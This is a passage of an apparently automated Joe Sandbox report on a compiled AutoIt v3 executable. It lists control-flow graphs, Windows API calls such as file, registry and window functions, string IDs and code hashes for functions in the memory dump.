                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B12D94
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 2914291525-1005189915
                                                • Opcode ID: 174172a7f4a5a33e7200679adf05f40e952e4aecf563d5cfeb787399bf1afa33
                                                • Instruction ID: 744faa19af59d1fb99946835c6aa5f676e69de2b8e6de63254f93b44394e9be6
                                                • Opcode Fuzzy Hash: 174172a7f4a5a33e7200679adf05f40e952e4aecf563d5cfeb787399bf1afa33
                                                • Instruction Fuzzy Hash: 0921E3B5901258AFDB00DFA8EC89BDDBFB8FB09700F10851AF511AB2A0DBB50540CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 301 b5065b-b5068b call b5042f 304 b506a6-b506b2 call b45221 301->304 305 b5068d-b50698 call b3f2c6 301->305 311 b506b4-b506c9 call b3f2c6 call b3f2d9 304->311 312 b506cb-b50714 call b5039a 304->312 310 b5069a-b506a1 call b3f2d9 305->310 322 b5097d-b50983 310->322 311->310 320 b50716-b5071f 312->320 321 b50781-b5078a GetFileType 312->321 324 b50756-b5077c GetLastError __dosmaperr 320->324 325 b50721-b50725 320->325 326 b507d3-b507d6 321->326 327 b5078c-b507bd GetLastError __dosmaperr CloseHandle 321->327 324->310 325->324 330 b50727-b50754 call b5039a 325->330 328 b507df-b507e5 326->328 329 b507d8-b507dd 326->329 327->310 331 b507c3-b507ce call b3f2d9 327->331 332 b507e9-b50837 call b4516a 328->332 333 b507e7 328->333 329->332 330->321 330->324 331->310 340 b50847-b5086b call b5014d 332->340 341 b50839-b50845 call b505ab 332->341 333->332 347 b5086d 340->347 348 b5087e-b508c1 340->348 341->340 346 b5086f-b50879 call b486ae 341->346 346->322 347->346 349 b508c3-b508c7 348->349 350 b508e2-b508f0 348->350 349->350 353 b508c9-b508dd 349->353 354 b508f6-b508fa 350->354 355 b5097b 350->355 353->350 354->355 356 b508fc-b5092f CloseHandle call b5039a 354->356 355->322 359 b50931-b5095d GetLastError __dosmaperr call b45333 356->359 360 b50963-b50977 356->360 359->360 360->355
                                                APIs
                                                  • Part of subcall function 00B5039A: CreateFileW.KERNEL32(00000000,00000000,?,00B50704,?,?,00000000), ref: 00B503B7
                                                • GetLastError.KERNEL32 ref: 00B5076F
                                                • __dosmaperr.LIBCMT ref: 00B50776
                                                • GetFileType.KERNEL32 ref: 00B50782
                                                • GetLastError.KERNEL32 ref: 00B5078C
                                                • __dosmaperr.LIBCMT ref: 00B50795
                                                • CloseHandle.KERNEL32(00000000), ref: 00B507B5
                                                • CloseHandle.KERNEL32(?), ref: 00B508FF
                                                • GetLastError.KERNEL32 ref: 00B50931
                                                • __dosmaperr.LIBCMT ref: 00B50938
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                • String ID: H
                                                • API String ID: 4237864984-2852464175
                                                • Opcode ID: 085fd42703130b80ca0ae194dbb176bc518d0e384f8409904142a1cb3024c101
                                                • Instruction ID: c12850c8a885804bc81b52e2b84675285c3f16d79dab733ef9ea27b8855986cf
                                                • Opcode Fuzzy Hash: 085fd42703130b80ca0ae194dbb176bc518d0e384f8409904142a1cb3024c101
                                                • Instruction Fuzzy Hash: 15A10432A241458FDF19AF68D892BAE3BE0EB0A321F1401D9FC159F291DB719D16CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00B13A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00BE1418,?,00B12E7F,?,?,?,00000000), ref: 00B13A78
                                                  • Part of subcall function 00B13357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B13379
                                                • RegOpenKeyExW.KERNEL32 ref: 00B1356A
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B5318D
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?), ref: 00B531CE
                                                • RegCloseKey.ADVAPI32(?), ref: 00B53210
                                                • _wcslen.LIBCMT ref: 00B53277
                                                • _wcslen.LIBCMT ref: 00B53286
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                • API String ID: 98802146-2727554177
                                                • Opcode ID: 6e035151cee2102a695b8e424ad8dd4058e0ad5b1d684f3ec30c9f5affd6ffaa
                                                • Instruction ID: a70a81745cf3135f1df2cefbc1ede54a86e66c0b6abcaacbe5c9fbb664cf1dee
                                                • Opcode Fuzzy Hash: 6e035151cee2102a695b8e424ad8dd4058e0ad5b1d684f3ec30c9f5affd6ffaa
                                                • Instruction Fuzzy Hash: 40718E714083419EC314EF65EC829ABBBE8FF85740F8004AEF54597260EF759A88CF66
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32 ref: 00B12B8E
                                                • LoadCursorW.USER32 ref: 00B12B9D
                                                • LoadIconW.USER32 ref: 00B12BB3
                                                • LoadIconW.USER32 ref: 00B12BC5
                                                • LoadIconW.USER32 ref: 00B12BD7
                                                • LoadImageW.USER32 ref: 00B12BEF
                                                • RegisterClassExW.USER32(?), ref: 00B12C40
                                                  • Part of subcall function 00B12CD4: GetSysColorBrush.USER32 ref: 00B12D07
                                                  • Part of subcall function 00B12CD4: RegisterClassExW.USER32(00000030), ref: 00B12D31
                                                  • Part of subcall function 00B12CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B12D42
                                                  • Part of subcall function 00B12CD4: InitCommonControlsEx.COMCTL32(?), ref: 00B12D5F
                                                  • Part of subcall function 00B12CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B12D6F
                                                  • Part of subcall function 00B12CD4: LoadIconW.USER32 ref: 00B12D85
                                                  • Part of subcall function 00B12CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B12D94
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                • String ID: #$0$AutoIt v3
                                                • API String ID: 423443420-4155596026
                                                • Opcode ID: d60ed9f2f9fe3905397865e23781b5246a8115c7e7ad8a8b09c33ae346093075
                                                • Instruction ID: aecd1c5cdf1d08eb29cd8485b875094b55f293ab078478b4547bd0c111086fdd
                                                • Opcode Fuzzy Hash: d60ed9f2f9fe3905397865e23781b5246a8115c7e7ad8a8b09c33ae346093075
                                                • Instruction Fuzzy Hash: A3210975E00358BBDB10DFA9EC95AAD7FF4FB49B50F20045AE500AB6A0DBB15940CF98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 436 b13170-b13185 437 b131e5-b131e7 436->437 438 b13187-b1318a 436->438 437->438 439 b131e9 437->439 440 b131eb 438->440 441 b1318c-b13193 438->441 442 b131d0-b131d8 DefWindowProcW 439->442 443 b131f1-b131f6 440->443 444 b52dfb-b52e23 call b118e2 call b2e499 440->444 445 b13265-b1326d PostQuitMessage 441->445 446 b13199-b1319e 441->446 447 b131de-b131e4 442->447 449 b131f8-b131fb 443->449 450 b1321d-b13244 SetTimer RegisterWindowMessageW 443->450 479 b52e28-b52e2f 444->479 448 b13219-b1321b 445->448 452 b131a4-b131a8 446->452 453 b52e7c-b52e90 call b7bf30 446->453 448->447 458 b13201-b13214 KillTimer call b130f2 call b13c50 449->458 459 b52d9c-b52d9f 449->459 450->448 454 b13246-b13251 CreatePopupMenu 450->454 455 b52e68-b52e77 call b7c161 452->455 456 b131ae-b131b3 452->456 453->448 472 b52e96 453->472 454->448 455->448 462 b52e4d-b52e54 456->462 463 b131b9-b131be 456->463 458->448 465 b52dd7-b52df6 MoveWindow 459->465 466 b52da1-b52da5 459->466 462->442 475 b52e5a-b52e63 call b70ad7 462->475 470 b13253-b13263 call b1326f 463->470 471 b131c4-b131ca 463->471 465->448 473 b52da7-b52daa 466->473 474 b52dc6-b52dd2 SetFocus 466->474 470->448 471->442 471->479 472->442 473->471 480 b52db0-b52dc1 call b118e2 473->480 474->448 475->442 479->442 484 b52e35-b52e48 call b130f2 call b13837 479->484 480->448 484->442
                                                APIs
                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00B1316A,?,?), ref: 00B131D8
                                                • KillTimer.USER32 ref: 00B13204
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B13227
                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00B1316A,?,?), ref: 00B13232
                                                • CreatePopupMenu.USER32 ref: 00B13246
                                                • PostQuitMessage.USER32 ref: 00B13267
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                • String ID: TaskbarCreated
                                                • API String ID: 129472671-2362178303
                                                • Opcode ID: ffbf0dc81fb06d4d0e364de8ef2fdc4383d68c7db9c181abb050ca5a74d535c1
                                                • Instruction ID: 1c141a6cbc5ab01eb6074da0c2457b17edf1d1104d377ad16e8c5e5649757cd6
                                                • Opcode Fuzzy Hash: ffbf0dc81fb06d4d0e364de8ef2fdc4383d68c7db9c181abb050ca5a74d535c1
                                                • Instruction Fuzzy Hash: 90411635240244B6DB146F6C9D8EBFD3AD9E706B40F9405E5F9029B2A1EF718EC097A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 492 b48d45-b48d55 493 b48d57-b48d6a call b3f2c6 call b3f2d9 492->493 494 b48d6f-b48d71 492->494 509 b490f1 493->509 496 b48d77-b48d7d 494->496 497 b490d9-b490e6 call b3f2c6 call b3f2d9 494->497 496->497 500 b48d83-b48dae 496->500 513 b490ec call b427ec 497->513 500->497 503 b48db4-b48dbd 500->503 506 b48dd7-b48dd9 503->506 507 b48dbf-b48dd2 call b3f2c6 call b3f2d9 503->507 511 b490d5-b490d7 506->511 512 b48ddf-b48de3 506->512 507->513 514 b490f4-b490f9 509->514 511->514 512->511 516 b48de9-b48ded 512->516 513->509 516->507 517 b48def-b48e06 516->517 520 b48e23-b48e2c 517->520 521 b48e08-b48e0b 517->521 525 b48e2e-b48e45 call b3f2c6 call b3f2d9 call b427ec 520->525 526 b48e4a-b48e54 520->526 523 b48e15-b48e1e 521->523 524 b48e0d-b48e13 521->524 527 b48ebf-b48ed9 523->527 524->523 524->525 557 b4900c 525->557 529 b48e56-b48e58 526->529 530 b48e5b-b48e79 call b43820 call b429c8 * 2 526->530 532 b48fad-b48fb6 call b4f89b 527->532 533 b48edf-b48eef 527->533 529->530 561 b48e96-b48ebc call b49424 530->561 562 b48e7b-b48e91 call b3f2d9 call b3f2c6 530->562 546 b48fb8-b48fca 532->546 547 b49029 532->547 533->532 538 b48ef5-b48ef7 533->538 538->532 539 b48efd-b48f23 538->539 539->532 543 b48f29-b48f3c 539->543 543->532 548 b48f3e-b48f40 543->548 546->547 552 b48fcc-b48fdb GetConsoleMode 546->552 550 b4902d-b49045 ReadFile 547->550 548->532 553 b48f42-b48f6d 548->553 555 b49047-b4904d 550->555 556 b490a1-b490ac GetLastError 550->556 552->547 558 b48fdd-b48fe1 552->558 553->532 560 b48f6f-b48f82 553->560 555->556 565 b4904f 555->565 563 b490c5-b490c8 556->563 564 b490ae-b490c0 call b3f2d9 call b3f2c6 556->564 559 b4900f-b49019 call b429c8 557->559 558->550 566 b48fe3-b48ffd ReadConsoleW 558->566 559->514 560->532 568 b48f84-b48f86 560->568 561->527 562->557 573 b49005-b4900b __dosmaperr 563->573 574 b490ce-b490d0 563->574 564->557 571 b49052-b49064 565->571 575 b4901e-b49027 566->575 576 b48fff GetLastError 566->576 568->532 578 b48f88-b48fa8 568->578 571->559 581 b49066-b4906a 571->581 573->557 574->559 575->571 576->573 578->532 585 b49083-b4908e 581->585 586 b4906c-b4907c call b48a61 581->586 587 b49090 call b48bb1 585->587 588 b4909a-b4909f call b488a1 585->588 597 b4907f-b49081 586->597 595 b49095-b49098 587->595 588->595 595->597 597->559
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5628927381e3aa7064837a3e727380d4c9efc893a780b0ed619bc8d3b4b9b97e
                                                • Instruction ID: 0a0c0c159b6800689dde225db90c4ba90aaa34d30439a63366d7171d8c923560
                                                • Opcode Fuzzy Hash: 5628927381e3aa7064837a3e727380d4c9efc893a780b0ed619bc8d3b4b9b97e
                                                • Instruction Fuzzy Hash: D8C1B074D04249AFDB11DFA8D881BAEBBF0EF19310F1441D9F915AB392CB709A41EB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 608 b12c63-b12cd3 CreateWindowExW * 2 ShowWindow * 2
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Window$CreateShow
                                                • String ID: AutoIt v3$edit
                                                • API String ID: 1584632944-3779509399
                                                • Opcode ID: dbd6902741977b128a6202f475fa539498fcbcc8a1b339ae9a06440e000d40c3
                                                • Instruction ID: d5ee656e0ea252c24f335e5349ae1a2677fa63ad3970bb63d3b84765e35836c7
                                                • Opcode Fuzzy Hash: dbd6902741977b128a6202f475fa539498fcbcc8a1b339ae9a06440e000d40c3
                                                • Instruction Fuzzy Hash: 56F0DA755402D07AEB311B1BAC89E772EBDD7C7F50B20045AF904AB5A0CA711851DAB8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 609 b461fe-b46217 610 b4622d-b46232 609->610 611 b46219-b46229 call b4fe21 609->611 613 b46234-b4623c 610->613 614 b4623f-b46263 MultiByteToWideChar 610->614 611->610 618 b4622b 611->618 613->614 616 b463f6-b46409 call b30a8c 614->616 617 b46269-b46275 614->617 620 b46277-b46288 617->620 621 b462c9 617->621 618->610 624 b462a7-b462b8 call b43820 620->624 625 b4628a-b46299 call b52040 620->625 622 b462cb-b462cd 621->622 626 b462d3-b462e6 MultiByteToWideChar 622->626 627 b463eb 622->627 624->627 636 b462be 624->636 625->627 635 b4629f-b462a5 625->635 626->627 631 b462ec-b462fe call b43467 626->631 630 b463ed-b463f4 __freea 627->630 630->616 638 b46303-b46307 631->638 637 b462c4-b462c7 635->637 636->637 637->622 638->627 639 b4630d-b46314 638->639 640 b46316-b4631b 639->640 641 b4634e-b4635a 639->641 640->630 642 b46321-b46323 640->642 643 b463a6 641->643 644 b4635c-b4636d 641->644 642->627 647 b46329-b46343 call b43467 642->647 648 b463a8-b463aa 643->648 645 b4636f-b4637e call b52040 644->645 646 b46388-b46399 call b43820 644->646 652 b463e4-b463ea __freea 645->652 658 b46380-b46386 645->658 646->652 659 b4639b 646->659 647->630 660 b46349 647->660 648->652 653 b463ac-b463c5 call b43467 648->653 652->627 653->652 663 b463c7-b463ce 653->663 662 b463a1-b463a4 658->662 659->662 660->627 662->648 664 b463d0-b463d1 663->664 665 b4640a-b46410 663->665 666 b463d2-b463e2 WideCharToMultiByte 664->666 665->666 666->652 667 b46412-b46419 __freea 666->667 667->630
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00B382D9,00B382D9,?,?,?,00B4644F,00000001,00000001,8BE85006), ref: 00B46258
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00B4644F,00000001,00000001,8BE85006,?,?,?), ref: 00B462DE
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B463D8
                                                • __freea.LIBCMT ref: 00B463E5
                                                  • Part of subcall function 00B43820: RtlAllocateHeap.NTDLL(00000000,?,00BE1444,?,00B2FDF5,?,?,00B1A976,00000010,00BE1440,00B113FC,?,00B113C6,?,00B11129), ref: 00B43852
                                                • __freea.LIBCMT ref: 00B463EE
                                                • __freea.LIBCMT ref: 00B46413
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                • String ID:
                                                • API String ID: 1414292761-0
                                                • Opcode ID: 30f8a9ab37b352ae30a29246378f9736f6a4e5412a77a49f96098fd4a0654167
                                                • Instruction ID: 2d1e651cffbf4266f33c366440d8f63db0c7755a289d03ebb0fd89450e1423bc
                                                • Opcode Fuzzy Hash: 30f8a9ab37b352ae30a29246378f9736f6a4e5412a77a49f96098fd4a0654167
                                                • Instruction Fuzzy Hash: 2151E372A00256BBDB258F68CC81EAF7BE9EF46710F1446A9FC05D7140EB34DE40E665
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B82C05
                                                • DeleteFileW.KERNEL32(?), ref: 00B82C87
                                                • CopyFileW.KERNEL32 ref: 00B82C9D
                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B82CAE
                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B82CC0
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: File$Delete$Copy
                                                • String ID:
                                                • API String ID: 3226157194-0
                                                • Opcode ID: b924c4179cd65b1d4b4beb75cbbb1677195bd8857c2695404cb6c71d200e4bae
                                                • Instruction ID: 29150e5b5303c3fc7a237ee3a80f9a58c498b2038cd30db93e3a816db9e7ba03
                                                • Opcode Fuzzy Hash: b924c4179cd65b1d4b4beb75cbbb1677195bd8857c2695404cb6c71d200e4bae
                                                • Instruction Fuzzy Hash: C6B15C72D01119ABDF25EBA4CC85EEEBBBDEF48310F1040E6F509E6151EA319A84CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 924 b13b1c-b13b27 925 b13b99-b13b9b 924->925 926 b13b29-b13b2e 924->926 927 b13b8c-b13b8f 925->927 926->925 928 b13b30-b13b48 RegOpenKeyExW 926->928 928->925 929 b13b4a-b13b69 RegQueryValueExW 928->929 930 b13b80-b13b8b RegCloseKey 929->930 931 b13b6b-b13b76 929->931 930->927 932 b13b90-b13b97 931->932 933 b13b78-b13b7a 931->933 934 b13b7e 932->934 933->934 934->930
                                                APIs
                                                • RegOpenKeyExW.KERNEL32 ref: 00B13B40
                                                • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00B13B61
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00B13B83
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: Control Panel\Mouse
                                                • API String ID: 3677997916-824357125
                                                • Opcode ID: 55a6a37c431e211d61a1a180124d371e251e3beb03a028daa969d8d9a5f1199f
                                                • Instruction ID: cbe93120ce2060486058b70617e3831a75d118662b78eeb42b5fc5994cb6a41f
                                                • Opcode Fuzzy Hash: 55a6a37c431e211d61a1a180124d371e251e3beb03a028daa969d8d9a5f1199f
                                                • Instruction Fuzzy Hash: 87112AB5514208FFDB218FA5DC85AEFBBF8EF05B44B50449AA805D7110F6319E809760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • Variable must be of type 'Object'., xrefs: 00B632B7
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Variable must be of type 'Object'.
                                                • API String ID: 0-109567571
                                                • Opcode ID: e2ed12b369a94ee992b1aedab1a862af7442ea35dd8dc3e71647acc91225bb2f
                                                • Instruction ID: 57a94a5bae4b9a82ba8de79e0c73176e8d30b8ed71592fc9c4ebc7a7fc99409c
                                                • Opcode Fuzzy Hash: e2ed12b369a94ee992b1aedab1a862af7442ea35dd8dc3e71647acc91225bb2f
                                                • Instruction Fuzzy Hash: F2C27871A00215CFCB24CF58D881AADB7F1FF18710FA481A9E926AB391D775ED81CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
